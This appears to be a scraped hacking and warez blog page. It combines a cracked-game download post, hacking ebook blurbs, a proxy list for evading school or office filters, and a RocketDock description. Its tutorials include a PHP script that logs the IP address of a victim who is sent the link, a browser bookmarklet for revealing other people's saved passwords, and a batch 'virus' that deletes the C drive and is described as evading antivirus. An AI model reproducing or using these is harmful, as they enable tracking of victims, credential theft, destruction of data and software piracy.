Brothers In Arms: Hell's Highway Free Download

Brothers in Arms: Hell's Highway (c) Ubisoft

10/2008 :..... RELEASE.DATE .. PROTECTION .......: Securom
1 :.......... DISC(S) .. GAME.TYPE .......: Action 




Brothers In Arms Hell's Highway brings the critically acclaimed squad-based 
WWII shooter into the next generation of gaming with amazing graphics and 
sound, new cutting-edge gameplay features and a completely redesigned 
online component. Delivering on the franchise's compelling story, unrivaled 
authenticity and intense squad-based action, Brothers In Arms Hell's 
Highway drops you into Operation Market-Garden, the largest airborne 
operation of World War II. Lead Matt Baker, Joe Hartsock and the rest of the 
101st Airborne Division as they fight to open "Hell's Highway" in a daring 
bid for a quick end to the war. 

1. Unrar. 
2. Burn or mount the image. 
3. Install the game. 
4. Copy over the cracked content located in the /Crack dir on the disc to 
your "installation\Binaries" directory. 
5. Play the game.


                                            1.Open the below download link in new window.

2. wait 5 seconds.



Trace Facebook Photo Location!!!!




Hack Everything With Smtp By Mauritania Hacker Team


How To Grab Someone Ip Address



                    I will you show you how to grab someone Ip address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chator by sending mail to victim. So Lets get started.

  • Copy the below codes into Notepad and save it as Grab.php (.php is must) 

<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);

imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";

Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);

header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>



  • Now make Free account on any of  the free web hosting sites Ripway or on My3gb or on 000webhost.com.
  • Now upload Grab.php to your web hosting site.
  • Copy the link of your  uploaded file and send it to victim.
  • As soon as victim will click on your link his ip will be saved in your free web hosting site.
  • Enjoy you are Done !!

Backtrack 5 Wireless Penetration Testing

will take you through the journey of becoming aWireless   Backtrack 5 Wireless Penetration Testing


Backtrack 5 Wireless Penetration Testing Beginner's Guide will take you through the journey of becoming aWireless hacker. You will learn variouswireless testing methodologies taught using live examples, which you will implement throughout this book. The engaging practical sessions very gradually grow in complexity giving you enough time to ramp up before you get to advancedwireless attacks.
This book will take you through the basicconcepts in Wireless and creating a lab environment for your experiments to the business of different lab sessions inwireless security basics, slowly turn on the heat and move to more complicated scenarios, and finally end your journey byconducting bleeding edge wireless attacks in your lab.



List Of Topic Covered In This Book

  • Create a Wireless Lab for conducting experiments
  • Monitor the air and sniff wireless packets
  • Bypass WLAN authentication mechanism
  • Crack WEP/WPA/WPA2 encryption mechanisms
  • Break into a WLAN network using infrastructure flaws
  • Break into a Wireless client such as a laptop
  • Advanced attacks such as Man-in-the-Middle attacks and Evading WIPS
  • Conduct wireless penetration test in a methodical way

    Hacking Ubuntu Linux Free Ebook



               Ubuntu, an African word meaning “humanity to others,” is the hottest thing in Linux today. This down-and-dirty book shows you how they can blow away the default system settings and get Ubuntu to behave however you want. You’ll learn how to optimize its appearance, speed, usability, and security and get the low-down on hundreds of hacks such as running Ubuntu from a USB drive, installing it on a Mac, enabling multiple CPUs, and putting scripts in menus and panels.


    Hacking Gps Ebook



    • This is the "user manual" that didn't come with any of the 30 million GPS receivers currently in use, showing readers how to modify, tweak, and hack their GPS to take it to new levels!
    • Crazy-cool modifications include exploiting secret keycodes, revealing hidden features, building power cords and cables, hacking the battery and antenna, protecting a GPS from impact and falls, making a screen protector, and solar-powering a GPS
    • Potential power users will take the function and performance of their GPS to a whole new level by hacking into the firmware and hacking into a PC connectionwith a GPS
    • Fear not! Any potentially dangerous mod (to the device) is clearly labeled, with precautions listed that should be taken
    •  Game time! Readers can check out GPS games, check into hacking geocaching, and even use a GPS as a metal detector

    1000+ Hacking Tutorials Collection

    Hacking Blackberry Mobile Phone Ebook



    Admit it. You're addicted to your BlackBerry. That's okay. Most usersare, and this book is just going to make it worse. Now you'll discover how to use your BlackBerry to retrieve documents, weatherforecasts, and Web infor-mation; use it as a wordprocessor or drawing tool; even control yourcomputer over a network with it. And we haven't even gotten to theway-out stuff.  Tweaks, tricks, and add-on apps to customize your BlackBerry--plus Java code for even cooler hacks.

    • Pick a few of these hacks
    • Play games with BlackBerry
    • Search the Web
    • Connect to your PC wirelessly
    • Use BlackBerry as a USB thumb drive
    • Install custom ringtones
    • Supersize security
    • Draw sketches on your screen
    • Play your BlackBerry like a piano

    Ceh V7 Instructor Slides




         This package includes the following modules.
    • Introduction to Ethical Hacking
    • Footprinting and Reconnaissance
    • Scanning Networks
    • Enumeration
    • System Hacking
    • Trojans and Backdoors
    • Viruses and Worms
    • Sniffers
    • Social Engineering
    • Denial of Service
    • Session Hijacking
    • Hacking Webservers
    • Hacking Web Applications
    • SQL Injection
    • Hacking Wireless Networks
    • Evading IDS, Firewalls and Honeypots
    • Buffer Overflows
    • Cryptography
    • Penetration Testing

    List Of Some Good Proxy Sites




                 Below is the list of some good proxy site which you can use to surfanoymously on the internet . Even you can use this proxy sites to open block websitein school or offices. For example you can use facebook if it is block at your school or office.


    http://aniscartujo.com/webproxy
    http://www.badboysproxy.com
    http://www.surfscreened.com
    http://www.hagiomusic.info
    http://www.greenpips.info
    http://urlbrowse.com
    http://www.hideipaddress.net
    http://www.sneakfilter.com
    http://www.browsestealth.com
    http://www.sneak1.info
    http://proxiesrus.com
    http://www.surfindark.com
    http://www.navydog.com
    http://falsario.com
    http://www.proxypit.com
    http://www.proxypan.com
    http://myspacewebproxy.org/
    http://www.allfreehere.info
    http://www.takefreely.info
    http://autobypass.com
    http://www.proxcity.info
    http://www.proxyzip.org
    http://www.cheekyproxy.com
    http://www.eggproxy.com
    http://www.theschoolcloak.com
    http://www.hidemefast.com
    http://browseanywhere.info
    http://www.404surf.com
    http://www.cloakip.net
    http://www.browsedark.com
    http://www.dartprox.com
    http://www.proxish.com
    http://www.surfsneak.com
    http://www.surfsneaky.com
    http://www.browsehidden.com
    http://www.filterhide.com
    http://www.browsesneak.com
    http://myspaceproxyy.com
    http://www.browsesneaky.com
    http://www.proxyz.us
    http://www.sneakschool.com
    http://www.iphide.com
    http://www.proogle.info
    http://greatproxy.info
    http://www.playnsurf.info
    http://www.realproxy.info
    http://aplusproxy.com
    http://www.ecoproxy.com
    http://freedom.webtuo.com
    http://www.slyuser.com/
    http://tenpass.com
    http://pawxy.com
    http://pawxy.org
    http://logu.in
        
          If you know such more proxy sites comment below i will add those.

    Get Password Behind Asterisks




               This is trick will let you see password behind asterisks. You might be thinking what is asterisks. It is dots or stars you see when you type password. This trick will let you see password behind asterisks. often people save their password on browser so this trick will let you get their password easily.

    • Go to the page that contain password in asterisks.
    • Now copy the following code.
    javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();
    • Paste the code into address bar of the page.
    • Now you will get the password on that page.
          NOTE: This trick works on internet explorer and might works on old version of other 
                        web browser.

    Learn To Make Dangerous Virus In A Minute


    In my previous post i had teach you guys to create virus that disable mouse andVirus to format Hard Disk. In this post i will teach you to make simple yet very powerfull or you can say harmfullcomputer virus using a batch file. No software is required to make this virus, Noteapad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.


    What will this virus do ?  

    You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

    How to Make the virus ?

       1. Open Notepad and copy below code into it.

    @Echo off
    Del C:\ *.* |y

       2. Save this file as virus.bat (Name can be anything but .bat is must)
       3. Now, running this file will delete all the content of C Drive.


    Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to yourcomputer.

    Rocketdock


    What is RocketDock?

    RocketDock is a smoothly animated, alpha blended application launcher. It provides a nice clean interface to drop shortcuts on for easy access and organization. With each item completely customizable there is no end to what you can add and launch from the dock.Now with added Taskbar support your minimized windows can appear as icons on the dock. This allows for better productivity and accessibility.


      

      

     

     

     

     

     

       

       

     

        

     

     

     

     

          Features:

    • Minimize windows to the dock
    • Real-time window previews in Vista
    • Running application indicators
    • Simple drag-n-drop interface
    • Multi-monitor support
    • Supports alpha-blended PNG and ICO icons
    • Icons zoom and transition smoothly
    • Auto-hide and Popup on mouse over
    • Positioning and layering options
    • Fully customizable
    • Completely Portable
    • ObjectDock Docklet support
    • Compatible with MobyDock, ObjectDock, RK Launcher, and Y'z Dock skins
    • Runs great on slower computers
    • Unicode compliant
    • Supports many languages and can easily be translated
    • A friendly user base :)
    • And best of all... its FREE!!! 

    Search

    Blog Archive